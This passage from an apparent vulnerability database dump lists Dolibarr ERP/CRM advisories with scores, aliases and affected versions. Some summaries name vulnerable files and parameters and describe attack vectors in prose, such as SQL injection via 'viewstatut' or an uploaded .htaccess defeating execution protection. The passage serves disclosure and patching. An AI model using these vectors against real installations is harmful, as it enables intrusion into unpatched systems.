|
| 4 |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 26 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 27 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 28 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 29 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 30 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 31 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 32 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 33 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 34 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 35 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 36 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 37 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 38 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 39 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 40 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 41 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 42 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 43 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 44 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 45 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 46 |
| vulnerability |
VCID-vvsw-shzx-ufgv |
|
| 47 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 48 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 49 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 50 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 51 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 52 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2 |
|
|
| aliases |
CVE-2018-10095, GHSA-p2fm-8rhj-58fr
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-nmjf-yxwc-m7hj |
|
| 43 |
| url |
VCID-nnth-kevf-vybz |
| vulnerability_id |
VCID-nnth-kevf-vybz |
| summary |
Improper Privilege Management
Dolibarr CRM allows privilege escalation. This could allow remote authenticated attackers to upload arbitrary files via `societe/document.php` in which `disabled` is changed to `enabled` in the HTML source code. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14201 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00146 |
| scoring_system |
epss |
| scoring_elements |
0.34673 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00146 |
| scoring_system |
epss |
| scoring_elements |
0.34751 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00146 |
| scoring_system |
epss |
| scoring_elements |
0.34787 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00146 |
| scoring_system |
epss |
| scoring_elements |
0.34771 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14201 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 9 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 10 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 11 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 12 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 13 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 14 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 15 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 16 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 17 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 18 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 19 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 20 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 21 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 22 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 23 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 24 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 25 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 26 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 27 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 28 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 29 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 30 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 31 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 32 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 33 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 34 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 35 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 36 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5 |
|
|
| aliases |
CVE-2020-14201, GHSA-25h3-mw3p-w8r7
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-nnth-kevf-vybz |
|
| 44 |
| url |
VCID-pejz-pskb-aqbg |
| vulnerability_id |
VCID-pejz-pskb-aqbg |
| summary |
Unrestricted Upload of File with Dangerous Type
Dolibarr allows low-privilege users to upload files of dangerous types, leading to arbitrary code execution. This occurs because `.pht` and `.phar` files can be uploaded. Also, an `.htaccess` file can be uploaded to reconfigure access control (e.g., to let `.noexe` files be executed as PHP code to defeat the `.noexe` protection mechanism). |
| references |
| 0 |
|
| 1 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14209 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.10166 |
| scoring_system |
epss |
| scoring_elements |
0.9326 |
| published_at |
2026-06-05T12:55:00Z |
|
| 1 |
| value |
0.10166 |
| scoring_system |
epss |
| scoring_elements |
0.93249 |
| published_at |
2026-06-04T12:55:00Z |
|
| 2 |
| value |
0.10166 |
| scoring_system |
epss |
| scoring_elements |
0.93261 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.10166 |
| scoring_system |
epss |
| scoring_elements |
0.93259 |
| published_at |
2026-06-07T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14209 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 9 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 10 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 11 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 12 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 13 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 14 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 15 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 16 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 17 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 18 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 19 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 20 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 21 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 22 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 23 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 24 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 25 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 26 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 27 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 28 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 29 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 30 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 31 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 32 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 33 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 34 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 35 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 36 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5 |
|
|
| aliases |
CVE-2020-14209, GHSA-2gcp-xwxg-hqg3
|
| risk_score |
10.0 |
| exploitability |
2.0 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-pejz-pskb-aqbg |
|
| 45 |
| url |
VCID-pfyf-s4fc-d3a8 |
| vulnerability_id |
VCID-pfyf-s4fc-d3a8 |
| summary |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
File Upload vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to execute arbitrary code and obtain sensitive information via the extension filtering and renaming functions. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track* |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-24T20:34:30Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2023-38887, GHSA-g8h7-mcp6-pf47
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-pfyf-s4fc-d3a8 |
|
| 46 |
| url |
VCID-qrcg-mnfa-k7gv |
| vulnerability_id |
VCID-qrcg-mnfa-k7gv |
| summary |
SQL Injection
Dolibarr ERP/CRM is affected by multiple SQL injection vulnerabilities via `comm/propal/list.php` (`viewstatut` parameter) or `comm/propal/list.php` (`propal_statut` parameter, aka `search_statut` parameter). |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-18260 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44451 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44507 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44528 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.4452 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2017-18260 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 26 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 27 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 28 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 29 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 30 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 31 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 32 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 33 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 34 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 35 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 36 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 37 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 38 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 39 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 40 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 41 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 42 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 43 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 44 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 45 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 46 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 47 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 48 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 49 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 50 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 51 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 52 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 53 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 54 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 55 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1 |
|
|
| aliases |
CVE-2017-18260, GHSA-9986-6m4g-25f6
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-qrcg-mnfa-k7gv |
|
| 47 |
|
| 48 |
| url |
VCID-s3d1-hcmh-fucu |
| vulnerability_id |
VCID-s3d1-hcmh-fucu |
| summary |
SQL Injection
Dolibarr ERP/CRM is affected by an SQL injection in versions via `product/stats/card.php` (`type` parameter). |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9839 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44451 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44507 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44528 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.4452 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9839 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-11u2-56qq-cye4 |
|
| 1 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 2 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 3 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 4 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 5 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 6 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 7 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 8 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 9 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 10 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 11 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 12 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 13 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 14 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 15 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 16 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 17 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 18 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 19 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 20 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 21 |
| vulnerability |
VCID-9xkp-4t9p-eqbb |
|
| 22 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 23 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 24 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 25 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 26 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 27 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 28 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 29 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 30 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 31 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 32 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 33 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 34 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 35 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 36 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 37 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 38 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 39 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 40 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 41 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 42 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 43 |
| vulnerability |
VCID-qrcg-mnfa-k7gv |
|
| 44 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 45 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 46 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 47 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 48 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 49 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 50 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 51 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 52 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 53 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 54 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 55 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 56 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 57 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 58 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
| 59 |
| vulnerability |
VCID-zjqj-1zrx-yqh6 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.4 |
|
|
| aliases |
CVE-2017-9839, GHSA-84gh-4m36-cgqx
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-s3d1-hcmh-fucu |
|
| 49 |
| url |
VCID-s3xn-47cy-eucf |
| vulnerability_id |
VCID-s3xn-47cy-eucf |
| summary |
Cross site scripting in dolibarr
A Cross-site Scripting (XSS) vulnerability exists in the `admin/accountant.php` file. The fields `town`, `name`, and `Accountant code` can be used to escape double quote protection. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-2060 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00511 |
| scoring_system |
epss |
| scoring_elements |
0.668 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00511 |
| scoring_system |
epss |
| scoring_elements |
0.66832 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00511 |
| scoring_system |
epss |
| scoring_elements |
0.66848 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00511 |
| scoring_system |
epss |
| scoring_elements |
0.6684 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-2060 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2022-2060, GHSA-8fvr-7945-mg7w
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-s3xn-47cy-eucf |
|
| 50 |
| url |
VCID-srth-2stq-gyaq |
| vulnerability_id |
VCID-srth-2stq-gyaq |
| summary |
Dolibarr has an Injection issue
A vulnerability was identified in Dolibarr ERP CRM up to 23.0.2. It affects the function `_checkValForAPI` in the file `htdocs/expedition/class/expedition.class.php` of the component Shipments API Endpoint. Manipulation of the argument `fields` leads to SQL injection. The attack can be carried out remotely, but a high degree of complexity is needed and the exploitability is rated as difficult. An exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
5.0 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L |
|
| 1 |
| value |
1.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 2 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 2 |
|
| 3 |
| reference_url |
https://vuldb.com/submit/799337 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
4.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
5 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 2 |
| value |
5 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 3 |
| value |
5.0 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L |
|
| 4 |
| value |
1.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
2.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
